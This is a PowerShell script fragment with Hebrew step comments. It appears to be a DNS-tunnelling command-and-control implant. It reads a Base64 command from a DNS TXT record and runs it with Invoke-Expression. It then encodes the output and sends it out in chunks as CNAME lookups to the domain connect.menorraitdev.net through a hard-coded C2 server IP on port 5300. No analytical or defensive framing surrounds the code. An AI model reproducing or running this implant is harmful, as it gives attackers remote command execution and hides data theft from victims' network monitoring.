# חילוץ הפקודה מרשומת ה-TXT
if ($output -match 'text\s*=\s*"(.*?)"') {
    $result = $matches[1]
}

Write-Output "Extracted TXT record: $result"

# שלב 2: פענוח הפקודה מ-Base64
try {
    $command = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($result))
    Write-Output "Decoded command: $command"
} catch {
    Write-Output "Failed to decode command from Base64"
    return
}

# שלב 3: הרצת הפקודה
$output = Invoke-Expression $command
Write-Output "Command output: $output"

# שלב 4: קידוד הפלט ל-Base64
try {
    $encodedOutput = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($output))
    Write-Output "Encoded output: $encodedOutput"
} catch {
    Write-Output "Failed to encode output to Base64"
    return
}

# שלב 5: פיצול הפלט ושליחתו כ-CNAME
$domain = "connect.menorraitdev.net"
$c2Server = "159.223.6.139"
$chunks = ($encodedOutput -split '(.{63})' | ? { $_ -ne "" })
$counter = 1

foreach ($chunk in $chunks) {
    $subdomain = "$counter.$chunk.$domain"
    Start-Process nslookup -ArgumentList "-type=CNAME -port=5300 $subdomain $c2Server"
    Start-Sleep -Milliseconds 200
    $counter++
}
